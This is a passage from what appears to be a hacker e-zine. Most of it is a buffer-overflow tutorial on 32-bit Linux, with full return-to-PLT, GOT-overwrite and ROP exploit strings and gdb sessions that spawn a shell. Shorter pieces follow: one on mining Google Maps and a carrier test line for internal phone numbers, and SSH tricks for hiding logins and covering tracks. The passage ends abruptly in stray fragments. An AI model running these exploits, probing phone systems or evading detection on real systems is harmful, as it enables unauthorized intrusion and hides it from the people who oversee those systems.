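    """True if the little-endian encoding of addr contains 0x00, which
    would truncate anything delivered through strcpy() at that point."""
    return b"\x00" in struct.pack("<I", addr)

# Both ASCII-Armored libc addresses from this session fail the check,
# while the stack pointer to "/bin/bash" is clean:
bad = [hex(a) for a in (0x00235eb0, 0x0022ac00) if has_null_byte(a)]
clean = not has_null_byte(0xbffff310)
```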
Note that should a positive offset (exit+X) not exist, we can instead search lower in memory and find a potential negative offset (exit-X). We can do this because the function adjacent to exit() doesn't terminate with a ret instruction, so jumping into it won't return but instead continue executing into the next function, which is conveniently exit().

(gdb) x/3i exit-1
   0x22abff:            add %dl,-0x77(%ebp)
   0x22ac02 <exit+2>:   in $0x57,%eax
   0x22ac04 <exit+4>:   push %esi
(gdb)

Oop, looks like an offset of -1 will cause instructions in exit() to be interpreted incorrectly. Remember that everything in memory is simply data until it is interpreted and given meaning, so by jumping into the middle of a multi-byte opcode, we are literally interpreting it to be a different instruction. If this new instruction is smaller than the rest of the original one, then instructions after it will be affected and interpreted differently also. Let's try an offset of -2:

(gdb) x/3i exit-2
   0x22abfe:            jbe 0x22ac00 <exit>
   0x22ac00 <exit>:     push %ebp
   0x22ac01 <exit+1>:   mov %esp,%ebp
(gdb)

At -2, the exit() function is interpreted correctly, but the two bytes before it are interpreted to be a conditional jump instruction. This introduces a major possibility for the flow of execution to be thrown off, so let's disregard this option and check offset -3:

(gdb) x/3i exit-3
   0x22abfd:            lea 0x0(%esi),%esi
   0x22ac00 <exit>:     push %ebp
   0x22ac01 <exit+1>:   mov %esp,%ebp
(gdb)

An offset of -3 looks like a good option. The three bytes before exit() are interpreted to be a harmless lea (load effective address) instruction which won't affect the interpretation or proper functionality of exit(). So, if for some reason 0x0022ac01 was not a viable option (say, input filtering), we could substitute it with 0x0022abfd with no consequence.

We still have to deal with the problem of ASCII-Armor, however, so let's move on to talk about a technique called return-to-PLT.

V. Return-to-PLT
================

The PLT, formally known as the Procedure Linkage Table, is a feature of ELF binaries that assists with the dynamic linking process. In order to understand how to abuse this feature, we need to first know a bit about what's happening behind the scenes.

By nature, ELF shared libraries are compiled as position-independent code (PIC), which means that they function and execute properly regardless of location in memory. This is fundamentally important to dynamic linking, because if all shared libraries were compiled with a static load address, a situation would inevitably arise where two libraries shared the same load address or overlapped each other in memory. By compiling shared libraries as PIC, the ELF linker decides at runtime which libraries to load and where in memory to map them to.

In order for the running program to find symbols within these libraries, it references a data structure called the Global Offset Table (GOT), which exists as a table of pointers into shared libraries. For Windows exploit developers, the GOT is essentially the same as the Import Address Table (IAT). When a function is called for the first time, a small piece of code is executed by the PLT to resolve the function's actual address. The GOT is patched with this address so that future calls to the library function's PLT stub directly reference the resolved address, resulting in greater efficiency. This is called lazy binding.

In the realm of exploitation, if the libc function you wish to call is legitimately used by the program, then it's as simple as calling the function's PLT stub. For instance, if system() is used elsewhere in the program, then an entry for it will exist in the PLT. Jumping directly to this address will execute the PLT stub, resolving the real address of the function in libc (or using the stored one in the GOT) and calling it.
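As a rough mental model of lazy binding — pure Python, with no relation to the linker's real data structures — the GOT behaves like a table of self-patching entries:

```python
resolve_log = []

def runtime_linker(name):
    """Stands in for the dynamic linker resolving a symbol on first use."""
    resolve_log.append(name)
    return lambda arg: "%s(%r)" % (name, arg)

got = {}

def plt_stub(name, arg):
    """A PLT stub: jump through the GOT entry; on the first call the
    resolver runs and patches the GOT with the real target address."""
    if name not in got:
        got[name] = runtime_linker(name)   # lazy binding: patch on first call
    return got[name](arg)                  # later calls go straight through

first = plt_stub("system", "/bin/echo woot")
second = plt_stub("system", "/bin/echo woot")
```

The exploit relevance is the last line of the stub: whatever address sits in the GOT entry is what gets called, which is exactly what the GOT overwrite section below abuses.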
By adding a call to system() elsewhere in our test program, we can observe this situation and take advantage of it.

[storm@Dysthymia audit]$ cat example.c
#include <string.h>
#include <stdlib.h>

void foo (char *bar)
{
    char c[12];

    strcpy(c, bar);  // no bounds checking...
    system("/bin/echo woot");
}

int main (int argc, char **argv)
{
    foo(argv[1]);
}

0x08048304  system
0x08048304  system@plt
0x08048314  __libc_start_main
0x08048314  __libc_start_main@plt
0x08048324  strcpy
0x08048324  strcpy@plt
0x08048340  _start
0x08048370  __do_global_dtors_aux
0x080483d0  frame_dummy
0x080483f4  foo
0x0804841a  main
0x08048440  __libc_csu_init
0x080484a0  __libc_csu_fini
0x080484a5  __i686.get_pc_thunk.bx
0x080484b0  __do_global_ctors_aux
0x080484dc  _fini

(gdb) break main
Breakpoint 1 at 0x804841d
(gdb) run
Starting program: /home/storm/Desktop/audit/example

Breakpoint 1, 0x0804841d in main ()
(gdb) find $esp, 0xbfffffff, "/bin/bash"
0xbffff310
1 pattern found.
(gdb) run `perl -e'print "A"x24 . "\x04\x83\x04\x08" . "XXXX" . "\x10\xf3\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/storm/Desktop/audit/example `perl -e'print "A"x24 . "\x04\x83\x04\x08" . "XXXX" . "\x10\xf3\xff\xbf"'`

Breakpoint 1, 0x0804841d in main ()
(gdb) c
Continuing.
Detaching after fork from child process 8096.
woot
Detaching after fork from child process 8097.

[storm@Dysthymia audit]$ echo We\'ve got shell.
We've got shell.
[storm@Dysthymia audit]$

VI. Return-to-PLT + Overwrite
=============================

Of course, system() is not always going to be available, and sometimes the functions that are available to us just don't cut it. At this point, we can take it another step further and take advantage of a different feature of dynamic linking by overwriting entries in the GOT itself.
Let's modify our test program a little more before continuing on, removing the call to system() and adding a call to printf():

[storm@Dysthymia audit]$ cat example.c
#include <string.h>
#include <stdio.h>

void foo (char *bar)
{
    char c[12];

    strcpy(c, bar);  // no bounds checking...
}

int main (int argc, char **argv)
{
    foo(argv[1]);
    printf("Your input: %s\n", argv[1]);
}
[storm@Dysthymia audit]$

Let's take a closer look at the PLT stub for printf():

0x08048304  __libc_start_main
0x08048304  __libc_start_main@plt
0x08048314  strcpy
0x08048314  strcpy@plt
0x08048324  printf
0x08048324  printf@plt
0x08048340  _start
0x08048370  __do_global_dtors_aux
0x080483d0  frame_dummy
0x080483f4  foo
0x0804840e  main
0x08048450  __libc_csu_init
0x080484b0  __libc_csu_fini
0x080484b5  __i686.get_pc_thunk.bx
0x080484c0  __do_global_ctors_aux
0x080484ec  _fini

(gdb) x/3i 0x08048324
   0x8048324 <printf@plt>:      jmp *0x80496bc
   0x804832a <printf@plt+6>:    push $0x18
   0x804832f <printf@plt+11>:   jmp 0x80482e4
(gdb)

This first instruction is interesting. It's dereferencing a pointer to somewhere in the GOT and then jumping to that value. Let's look back to our program that reads /proc/self/maps:

[storm@Dysthymia audit]$ ./stacky | grep 08049
08048000-08049000 r-xp 00000000 fd:03 263455    /home/storm/Desktop/audit/stacky
08049000-0804a000 rw-p 00000000 fd:03 263455    /home/storm/Desktop/audit/stacky
[storm@Dysthymia audit]$

It looks like the GOT is writable! By chaining together calls to libc, we can write four arbitrary bytes to 0x80496bc, effectively relocating printf() to an address of our choosing. The next time printf() is called, our target code will be run instead.

As usual, our goal here will be system(). There is really no reason for a pointer to system() to be present anywhere in memory, so we're going to have to construct it byte-by-byte. Note that while we're using strcpy() for our exploit, any function that moves bytes may be used, such as memcpy(), strcat(), or sprintf().
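The byte-by-byte patch can be simulated away from the debugger. In this sketch (not from the original article; offsets 0 through 3 stand in for 0x80496bc through 0x80496bf), four one-byte writes assemble &system in the GOT slot:

```python
import struct

got_slot = bytearray(4)                  # the 4-byte GOT entry for printf()
system_bytes = (0xb0, 0x5e, 0x23, 0x00)  # 0x00235eb0 in little-endian order

def chained_strcpy(dest, offset, byte):
    """Model one link of the strcpy() chain: land one useful byte.
    (A real strcpy() also drags along trailing bytes up to the next 0x00,
    but each later write overwrites that garbage, as noted above.)"""
    dest[offset] = byte

for i, b in enumerate(system_bytes):
    chained_strcpy(got_slot, i, b)

patched = struct.unpack("<I", bytes(got_slot))[0]
```

After the four writes, the slot decodes back to 0x00235eb0, so the next `jmp *0x80496bc` lands in system().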
Let's build a new template:

AAAAAAAAAAAAAAAAAAAAAAAA
[ strcpy@plt ] [ pop pop ret ] [ GOT_of_printf[0] ] [ system[0] ]
[ strcpy@plt ] [ pop pop ret ] [ GOT_of_printf[1] ] [ system[1] ]
[ strcpy@plt ] [ pop pop ret ] [ GOT_of_printf[2] ] [ system[2] ]
[ strcpy@plt ] [ pop pop ret ] [ GOT_of_printf[3] ] [ system[3] ]
[ printf@plt ] [ any 4 bytes ] [ address of "/bin/bash" ]

Conceptually, the process will first return into strcpy(), moving the first byte of &system into the first byte of the GOT entry for printf() (as well as anything after it up until 0x00 since we're using strcpy(), but this doesn't really matter). Upon returning from strcpy(), it will then jump into a pop pop ret gadget, which pops the two arguments of the first strcpy() off the stack and returns into the second strcpy(), granting us the ability to chain libc calls with two arguments.

Wait, did we say gadget? It's almost like we're writing a ROP exploit or something....

A gadget is essentially a small sequence of instructions that exists in the process's address space that does something useful for our exploit. By returning into a gadget, we can leverage existing code to manipulate memory and registers in a predictable way. While gadgets come in many different forms and can perform many different operations, one thing that always remains constant is that they are terminated by a ret instruction. In a "true" ROP exploit, our libc chain is replaced instead by a chain of pointers to gadgets, executing one after another to set the process memory in a specific state to perform a specific task.

For instance, on Windows 32-bit systems, one of the most common methods of ROP exploitation is to allocate a new executable heap by returning into VirtualAlloc() or marking an existing heap executable using VirtualProtect(). Gadgets are then used to copy second-stage shellcode onto the newly-created heap, ultimately jumping into the heap and executing the shellcode.
In order to find our pop pop ret gadget, we'll use msfelfscan, part of the Metasploit framework. If developing an exploit on Win32, the mona.py plugin for Immunity Debugger by Corelan Team is one of the best options for not only discovering potential gadget candidates, but automatically chaining them into workable ROP chains.

[storm@Dysthymia audit]$ msfelfscan | grep \\-p
    -p, --poppopret                  Search for pop+pop+ret combinations
[storm@Dysthymia audit]$ msfelfscan -p ./example
[./example]
0x080483c3 pop ebx; pop ebp; ret
0x080484a7 pop edi; pop ebp; ret
0x080484e8 pop ebx; pop ebp; ret
[storm@Dysthymia audit]$

Any of these gadgets should do fine. Let's update our template with what we know so far: strcpy@plt, printf@plt, GOT_of_printf, and pop pop ret. Let's just stick "AAAA" in the return address of the overwritten printf(), since it really doesn't matter. While we're at it, let's just find the address of "/bin/bash" too:

(gdb) run
Starting program: /home/storm/Desktop/audit/example

Breakpoint 1, 0x08048411 in main ()
(gdb) find $esp, 0xbfffffff, "/bin/bash"
0xbffff310
1 pattern found.
(gdb)

So, that brings us to:

AAAAAAAAA...
[ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbc\x96\x04\x08 ] [ system[0] ]
[ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbd\x96\x04\x08 ] [ system[1] ]
[ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbe\x96\x04\x08 ] [ system[2] ]
[ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbf\x96\x04\x08 ] [ system[3] ]
[ \x24\x83\x04\x08 ] [ \x41\x41\x41\x41 ] [ \x10\xf3\xff\xbf ]

All we have left to do is find the locations of four bytes in memory that will be assembled together to form &system.

(gdb) p system
$1 = {<text variable, no debug info>} 0x235eb0 <__libc_system>
(gdb)

These four bytes are: 0x00, 0x23, 0x5e, and 0xb0. It will be pretty easy to find these bytes somewhere in memory, but for the greatest reliability we should confine the search to just within the loaded program itself.
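gdb's find command, used below, is doing nothing more than a linear scan over mapped memory, which is easy to replicate. This sketch runs over a synthetic byte string, not the real ./example image:

```python
BASE = 0x08048134  # start of the searchable region in ./example (.interp)

def find_byte(image, base, value):
    """Absolute addresses of every occurrence of a single byte value."""
    return [base + i for i, b in enumerate(image) if b == value]

# synthetic stand-in for the mapped binary image
image = b"\x90\x23\x00\x55\x5e\x90\xb0"
hits = {v: find_byte(image, BASE, v) for v in (0x00, 0x23, 0x5e, 0xb0)}
```

Any hit for each of the four byte values will do, as long as it lies at a static, null-free address.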
For obvious reasons, we can't directly address the shared libraries, and the stack and heap are too dynamic for reliable use. By looking back at the output of ./stacky in the beginning of this paper, we notice that the memory region 0x08048000-0x0804a000 remains static throughout every invocation of the program, both with and without ASLR enabled. By looking at the ELF header of ./example, we see that within this region of memory resides the binary image itself:

[storm@Dysthymia audit]$ readelf -S ./example
There are 30 section headers, starting at offset 0x7ec:

Section Headers:
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .interp           PROGBITS        08048134 000134 000013 00   A  0   0  1  <---- start
  [ 2] .note.ABI-tag     NOTE            08048148 000148 000020 00   A  0   0  4
  [ 3] .note.gnu.build-i NOTE            08048168 000168 000024 00   A  0   0  4
  [ 4] .gnu.hash         GNU_HASH        0804818c 00018c 000020 04   A  5   0  4
  [ 5] .dynsym           DYNSYM          080481ac 0001ac 000060 10   A  6   1  4
  [ 6] .dynstr           STRTAB          0804820c 00020c 000053 00   A  0   0  1
  [ 7] .gnu.version      VERSYM          08048260 000260 00000c 02   A  5   0  2
  [ 8] .gnu.version_r    VERNEED         0804826c 00026c 000020 00   A  6   1  4
  [ 9] .rel.dyn          REL             0804828c 00028c 000008 08   A  5   0  4
  [10] .rel.plt          REL             08048294 000294 000020 08   A  5  12  4
  [11] .init             PROGBITS        080482b4 0002b4 000030 00  AX  0   0  4
  [12] .plt              PROGBITS        080482e4 0002e4 000050 04  AX  0   0  4
  [13] .text             PROGBITS        08048340 000340 0001ac 00  AX  0   0 16
  [14] .fini             PROGBITS        080484ec 0004ec 00001c 00  AX  0   0  4
  [15] .rodata           PROGBITS        08048508 000508 00001c 00   A  0   0  4
  [16] .eh_frame_hdr     PROGBITS        08048524 000524 000024 00   A  0   0  4
  [17] .eh_frame         PROGBITS        08048548 000548 00007c 00   A  0   0  4
  [18] .ctors            PROGBITS        080495c4 0005c4 000008 00  WA  0   0  4
  [19] .dtors            PROGBITS        080495cc 0005cc 000008 00  WA  0   0  4
  [20] .jcr              PROGBITS        080495d4 0005d4 000004 00  WA  0   0  4
  [21] .dynamic          DYNAMIC         080495d8 0005d8 0000c8 08  WA  6   0  4
  [22] .got              PROGBITS        080496a0 0006a0 000004 04  WA  0   0  4
  [23] .got.plt          PROGBITS        080496a4 0006a4 00001c 04  WA  0   0  4
  [24] .data             PROGBITS        080496c0 0006c0 000004 00  WA  0   0  4
  [25] .bss              NOBITS          080496c4 0006c4 000008 00  WA  0   0  4  <---- end
  [26] .comment          PROGBITS        00000000 0006c4 00002c 01  MS  0   0  1
  [27] .shstrtab         STRTAB          00000000 0006f0 0000fc 00      0   0  1
  [28] .symtab           SYMTAB          00000000 000c9c 000430 10     29  45  4
  [29] .strtab           STRTAB          00000000 0010cc 000215 00      0   0  1
Key to Flags:
  W (write), A (alloc), X (execute), M (merge), S (strings)
  I (info), L (link order), G (group), x (unknown)
  O (extra OS processing required) o (OS specific), p (processor specific)
[storm@Dysthymia audit]$

Using gdb, we can quickly search for hits within this range:

(gdb) find /b /1 0x08048134,0x080496c4,0x00
0x8048146
1 pattern found.
(gdb) find /b /1 0x08048134,0x080496c4,0x23
0x804883c
1 pattern found.
(gdb) find /b /1 0x08048134,0x080496c4,0x5e
0x8048342 <_start+2>
1 pattern found.
(gdb) find /b /1 0x08048134,0x080496c4,0xb0
0x8048294
1 pattern found.
(gdb)

Excellent. Let's update our template one last time:

AAAAAAAAA...
[ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbc\x96\x04\x08 ] [ \x94\x82\x04\x08 ]
[ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbd\x96\x04\x08 ] [ \x42\x83\x04\x08 ]
[ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbe\x96\x04\x08 ] [ \x3c\x88\x04\x08 ]
[ \x14\x83\x04\x08 ] [ \xc3\x83\x04\x08 ] [ \xbf\x96\x04\x08 ] [ \x46\x81\x04\x08 ]
[ \x24\x83\x04\x08 ] [ \x41\x41\x41\x41 ] [ \x10\xf3\xff\xbf ]

Tie it all together and let it rip:

(gdb) run "'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/storm/Desktop/audit/example "'`
Detaching after fork from child process 14372.

[storm@Dysthymia audit]$ echo hax hax hax
hax hax hax
[storm@Dysthymia audit]$

VII. Return-to-libc by neg ROP
==============================

Readers should make sure they are familiar with all previous sections before continuing on.

It's worthwhile to know that there is, in fact, more than one way to circumvent ASCII-Armor. A second technique discussed here is much shorter than the GOT overwrite method and relies more heavily on ROP. For this method, we'll be borrowing a common tactic used by Windows exploit developers. Instead of assembling an address byte-by-byte and patching the GOT, we can simply load the negated address of system() into a register, negate the register, and then call the value of the register.
As our program is very small and doesn't contain a lot of code (and therefore very few gadgets to work with), for the sake of the example we'll introduce a few small functions that provide the appropriate neg and pop gadgets needed. Larger applications will have more code and more gadgets to choose from, greatly increasing our chances of constructing a complete, featureful ROP chain.

[storm@Dysthymia audit]$ cat example.c
#include <string.h>
#include <stdio.h>
#include <stdlib.h>

void foo (char *bar)
{
    char c[12];

    strcpy(c, bar);  // no bounds checking...
}

int coff (int p)
{
    int x = 50008;   // this integer generates a 'pop eax; ret' sequence
    int d = x-p;

    printf("Difference from threshold: %i\n", d);
    return d;
}

int tcomp (int p)
{
    return -p;       // will produce a 'neg eax' gadget
}

int main (int argc, char **argv)
{
    foo(argv[1]);
    printf("Your input: %s\n", argv[1]);
}
[storm@Dysthymia audit]$ gcc example.c -o example
[storm@Dysthymia audit]$

Let's build a new template for our exploit:

AAAAAAAAAAAAAAAAAAAAAAAA [ pop eax ] [ two's complement of &system ] [ neg eax ] [ call eax ] [ "/bin/bash" ]
          ^
          |
 overflow ("A"x24)

In earlier ret2libc exploit demonstrations, we allocated a 4-byte return-to pointer between the return to system() and the function's argument, but since we are executing an actual call procedure instead of returning into system(), a return-to pointer is being pushed onto the stack for us. The next pointer immediately in our exploit string is our function argument.

In order to build our ROP chain, we'll use ROPeMe to scan the binary and generate gadgets:

[storm@Dysthymia audit]$ ropeme-bhus10/ropeme/ropshell.py
Simple ROP interactive shell: [generate, load, search] gadgets
ROPeMe> generate ./example 4
Generating gadgets for ./example with backward depth=4
It may take few minutes depends on the depth and file size...
Processing code block 1/1
Generated 87 gadgets
Dumping asm gadgets to file: example.ggt ...
OK
ROPeMe> search pop %
Searching for ROP gadget:  pop % with constraints: []
0x80482e0L: pop eax ; pop ebx ; leave ;;
0x8048417L: pop eax ;;
0x80484f3L: pop ebp ; ret ; mov ebx [esp] ;;
0x80483c4L: pop ebp ;;
0x804844bL: pop ebp ;;
0x80484e8L: pop ebp ;;
0x80482e1L: pop ebx ; leave ;;
0x8048545L: pop ebx ; leave ;;
0x80483c3L: pop ebx ; pop ebp ;;
0x8048528L: pop ebx ; pop ebp ;;
0x80484e5L: pop ebx ; pop esi ; pop edi ; pop ebp ;;
0x8048544L: pop ecx ; pop ebx ; leave ;;
0x80484e7L: pop edi ; pop ebp ;;
0x80484e6L: pop esi ; pop edi ; pop ebp ;;
ROPeMe> search neg %
Searching for ROP gadget:  neg % with constraints: []
0x8048449L: neg eax ; pop ebp ;;
ROPeMe> search call %
Searching for ROP gadget:  call % with constraints: []
0x80483f0L: call eax ; leave ;;
0x8048543L: call far dword [ecx+0x5b] ; leave ;;
ROPeMe>

For our 'pop eax' gadget, we'll choose 0x8048417 since it's the only straightforward option. Notice that there is also a 'pop eax; pop ebx; leave ;;' gadget located at 0x80482e0, but we want to avoid gadgets like these if at all possible to prevent having to work around the leave instruction messing up the stack pointer (leave in x86 means literally 'mov esp, ebp; pop ebp').

AAAAAAAAAAAAAAAAAAAAAAAA [ \x17\x84\x04\x08 ] [ two's comp of &system ] [ neg eax ] [ call eax ] [ "/bin/bash" ]
          ^
          |
 overflow ("A"x24)

For our 'neg eax' gadget, 0x8048449 is our only option but it will work fine. We'll have to work around the 'pop ebp' instruction by modifying our template and adding a junk pointer into the ROP chain immediately after the pointer to the gadget. When the gadget executes, it will first negate eax (as we want) and then pop four junk bytes to ebp, performing nothing directly useful for us but preventing the instruction from disrupting the rest of the chain.
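The arithmetic behind the trick: two's-complement negation wraps modulo 2^32, so negating twice round-trips. A quick Python sanity check (not part of the original exploit) using the &system value from this session:

```python
MASK = 0xffffffff

def neg32(value):
    """What 'neg eax' computes: 32-bit two's-complement negation."""
    return (-value) & MASK

encoded = neg32(0x00235eb0)  # the null-free value placed in the exploit string
decoded = neg32(encoded)     # what the gadget recovers in eax at runtime
```

0xffdca150 contains no null bytes, which is the whole point: it survives strcpy() where 0x00235eb0 would not.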
AAAAAAAAAAAAAAAAAAAAAAAA [ \x17\x84\x04\x08 ] [ two's comp of &system ] [ \x41\x41\x41\x41 ] [ call eax ] [ "/bin/bash" ]
          ^                                                                       ^
          |                                                                       |
 overflow ("A"x24)                                                      junk 4 bytes

(with [ \x49\x84\x04\x08 ] — the 'neg eax ; pop ebp' gadget — placed between the two's complement and the junk bytes)

For our 'call eax' gadget, 0x80483f0 is our only candidate but it will also work fine. We don't have to worry about the leave instruction in this gadget since we will have already returned into system() beforehand, so the only time it will be executed is after our dropped shell is closed. At this point, the program will be heading towards a segfault anyways.

AAAAAAAAAAAAAAAAAAAAAAAA [ \x17\x84\x04\x08 ] [ two's comp of &system ] [ \x49\x84\x04\x08 ] [ \x41\x41\x41\x41 ] [ \xf0\x83\x04\x08 ] [ "/bin/bash" ]
          ^
          |
 overflow ("A"x24)

We can calculate the two's complement (negation) of &system in gdb:

[storm@Dysthymia audit]$ gdb -q ./example
Reading symbols from /home/storm/Desktop/audit/example...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x8048450
(gdb) run
Starting program: /home/storm/Desktop/audit/example

Breakpoint 1, 0x08048450 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x235eb0 <__libc_system>
(gdb) p/x -0x235eb0
$2 = 0xffdca150
(gdb)

Update:

AAAAAAAAAAAAAAAAAAAAAAAA [ \x17\x84\x04\x08 ] [ \x50\xa1\xdc\xff ] [ \x49\x84\x04\x08 ] [ \x41\x41\x41\x41 ] [ \xf0\x83\x04\x08 ] [ "/bin/bash" ]
          ^
          |
 overflow ("A"x24)

Finding the location of "/bin/bash" should be routine by now:

(gdb) find $esp, 0xbfffffff, "/bin/bash"
0xbffff310
1 pattern found.
(gdb)

And let's fill in the final part of the template:

AAAAAAAAAAAAAAAAAAAAAAAA [ \x17\x84\x04\x08 ] [ \x50\xa1\xdc\xff ] [ \x49\x84\x04\x08 ] [ \x41\x41\x41\x41 ] [ \xf0\x83\x04\x08 ] [ \x10\xf3\xff\xbf ]
          ^
          |
 overflow ("A"x24)

And cross our fingers:

(gdb) disas foo
Dump of assembler code for function foo:
   0x080483f4 <+0>:     push %ebp
   0x080483f5 <+1>:     mov %esp,%ebp
   0x080483f7 <+3>:     sub $0x28,%esp
   0x080483fa <+6>:     mov 0x8(%ebp),%eax
   0x080483fd <+9>:     mov %eax,0x4(%esp)
   0x08048401 <+13>:    lea -0x14(%ebp),%eax
   0x08048404 <+16>:    mov %eax,(%esp)
   0x08048407 <+19>:    call 0x8048314 <strcpy@plt>
   0x0804840c <+24>:    leave
   0x0804840d <+25>:    ret
End of assembler dump.
(gdb) delete
Delete all breakpoints? (y or n) y
(gdb) break *0x0804840d
Breakpoint 2 at 0x804840d
(gdb) run "'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/storm/Desktop/audit/example "'`

Breakpoint 2, 0x0804840d in foo ()
(gdb) x/32x $esp
0xbfffef3c:     0x08048417      0xffdca150      0x08048449      0x41414141
(gdb) x/i $eip
=> 0x804840d <foo+25>:  ret
(gdb) si
Cannot access memory at address 0x41414145
(gdb) x/5i $eip
=> 0x8048417 <coff+9>:  pop %eax
   0x8048418 <coff+10>: ret
   0x8048419 <coff+11>: add %al,(%eax)
   0x804841b <coff+13>: mov 0x8(%ebp),%eax
   0x804841e <coff+16>: mov -0xc(%ebp),%edx
(gdb) si
0x08048418 in coff ()
(gdb) i r eax
eax            0xffdca150       -2318000
(gdb) si
Cannot access memory at address 0x41414145
(gdb) x/5i $eip
=> 0x8048449 <tcomp+6>: neg %eax
   0x804844b <tcomp+8>: pop %ebp
   0x804844c <tcomp+9>: ret
   0x804844d <main>:    push %ebp
   0x804844e <main+1>:  mov %esp,%ebp
(gdb) si
0x0804844b in tcomp ()
(gdb) i r eax
eax            0x235eb0 2318000
(gdb) x/32x $esp
0xbfffef48:     0x41414141      0x080483f0      0xbffff310      0x00000000
0xbfffef58:     0xbfffefd8      0x00212e36      0x00000002      0xbffff004
0xbfffef68:     0xbffff010      0xb7fff478      0x00110414      0xffffffff
0xbfffef78:     0x001f8fbc      0x08048243      0x00000001      0xbfffefc0
0xbfffef88:     0x001e8da7      0x001f9ab8      0xb7fff758      0x00381ff4
0xbfffef98:     0x00000000      0x00000000      0xbfffefd8      0xa41d67a2
0xbfffefa8:     0x199850dd      0x00000000      0x00000000      0x00000000
0xbfffefb8:     0x00000002      0x08048340      0x00000000      0x001ef420
(gdb) si
0x0804844c in tcomp ()
(gdb) i r ebp
ebp            0x41414141       0x41414141
(gdb) x/5i $eip
=> 0x804844c <tcomp+9>: ret
   0x804844d <main>:    push %ebp
   0x804844e <main+1>:  mov %esp,%ebp
   0x8048450 <main+3>:  and $0xfffffff0,%esp
   0x8048453 <main+6>:  sub $0x10,%esp
(gdb) x/32x $esp
0xbfffefbc:     0x08048340      0x00000000      0x001ef420      0x00212d5b
(gdb) si
Cannot access memory at address 0x41414145
(gdb) x/5i $eip
=> 0x80483f0 <frame_dummy+32>:  call *%eax
   0x80483f2 <frame_dummy+34>:  leave
   0x80483f3 <frame_dummy+35>:  ret
   0x80483f4 <foo>:     push %ebp
   0x80483f5 <foo+1>:   mov %esp,%ebp
(gdb) si
__libc_system (line=0xbffff310 "/bin/bash") at ../sysdeps/posix/system.c:179
179     {
(gdb) c
Continuing.
Detaching after fork from child process 16945.

[storm@Dysthymia audit]$ echo ROP til you drop
ROP til you drop
[storm@Dysthymia audit]$

VIII. References and Further Reading
====================================

Special thanks to corelanc0d3r, phetips, and zx2c4 for their review and suggestions

[==================================================================================================]
-=[ 0x07 A New Kind of Google Mining
-=[ Author: Shadytel, Inc
-=[ Website:

There are two kinds of CEOs in this world: those who take advantage of every resource they possibly can, and pussies. Our arrest at a Communications Fraud Control Association convention suggests there's more of the latter than we thought, so there seemed no better time than now to help fellow corporate overlords expand their ruthlessness.

There are times when scanning can flat out suck - we'll be the first to admit it. There's no better way to kill your initiative than to go through a range filled with numbers that just ring or put you on the phone with bewildered subscribers. If you're just looking for an interesting way to kill some time, there's a much easier way. Here to give you a hand is a tool you'd never expect: Google Maps.

For example, let's do a search for AT&T in Terre Haute, Indiana.
Keeping in mind that all the AT&T results that are legitimately cell phone stores have the AT&T logo by them, let's pick the first one that doesn't; 812-235-0096. What we got wasn't a bad start at all.

"You've reached AT&T in Terre Haute, Indiana. This is an unmanned site. Please leave a message after the tone or if you need immediate assistance, contact the on-site workforce."

While it's noteworthy that the mailbox in question is on a Nortel PBX, the configuration is pretty well locked down. So to even the odds out a little, we'll throw out another nifty technique - this time an IVR made by Verizon shortly before the Frontier buyout of several states. The CLEC maintenance center is pretty much what it sounds like: an IVR for switchless resellers to help test customer lines and create trouble reports. Give it a try: (877) 503-8260.

Right away, you'll be asked for the OCN of the company you work for. Type in 0772; this goes for all unported Verizon or Frontier lines in ex-GTE states. Select the all other category, the state of Indiana, and give it the number to the AT&T PBX. Once it looks up the account number, you'll be greeted with four options:

Press one for 812-235-0096
Press two for 812-235-0575
Press three for 812-235-4781
Press four for 812-235-5087

These all correspond to numbers associated with that same account. So not a bad way to find a few interesting numbers, right? Here's a few other nice things we found.

207-693-9920 - Sensaphone (searched for Fairpoint in Portland, ME)
406-495-1408 - Weird ANAC, test command 7 is non-functioning ringback (searched for Qwest Communications in Helena, MT)
304-263-2510 - Verizon Potomac Assignment Provisioning Center number changed recording (searched for C&P Telco in Martinsburg, WV)

That last listing brings us to two final points; first of all, type slowly - the auto-suggest feature is a better friend than you might think.
Second, sometimes the best way to search is to use the names of phone companies that don't exist anymore - or just aren't generally used to do business with the public. For example, C&P Telephone hasn't existed since the Bell System breakup. MCI is another good one, but there's also quite a few numbers that ring out, so it can be a little tedious. We personally like AT&T best, since they constantly feel the need to share their more interesting internal numbers.

So like the article itself, this technique probably isn't for anybody wanting a long-term project; but if you want something instantly - whether it be excitement, lulz, or puzzling contraptions to cut your teeth with, just add water. As always, keep it evil, keep it shady, keep it ruthless.

[==================================================================================================]
-=[ 0x08 Stupid Shell Tricks
-=[ Author: teh crew

Logging into SSH and interacting with a shell is probably necessary at one point or another in one's hacking career. We've compiled a list of tips and tricks from various individuals in the community that may prove helpful next time you're looking to avoid detection and cover your tracks on a system.

-----

The common way to list logged-in users has always been the `w` command. First described in article 0x04 of Phrack #64, the -T flag in ssh can be used to not allocate a tty upon login, preventing the user from being listed in `w` output:

ssh -T storm@gonullyourself.org

This obviously leaves you with a blank prompt, so it's not a bad idea to simulate one:

ssh -T storm@gonullyourself.org bash -i

For those who care, we can prevent logging the remote host's information to known_hosts through:

ssh -T -o UserKnownHostsFile=/dev/null storm@gonullyourself.org bash -i

Not having a tty causes some predictable issues with certain programs. Utilities like `man` and `less` will print out data in its entirety instead of fitting it to the terminal and providing scrollability.
`screen` will flat-out refuse to work:

[storm@mania ~]$ screen
Must be connected to a terminal.

Fortunately, we can fake a tty using Python, which gives us somewhat broken support for some of the utilities we want to use:

[storm@mania ~]$ python -c 'import pty;pty.spawn("/bin/sh")'
sh-3.2$ perl -e'print "$_\n" for ( 1 .. 20 )'

1. Employers
2. Roles
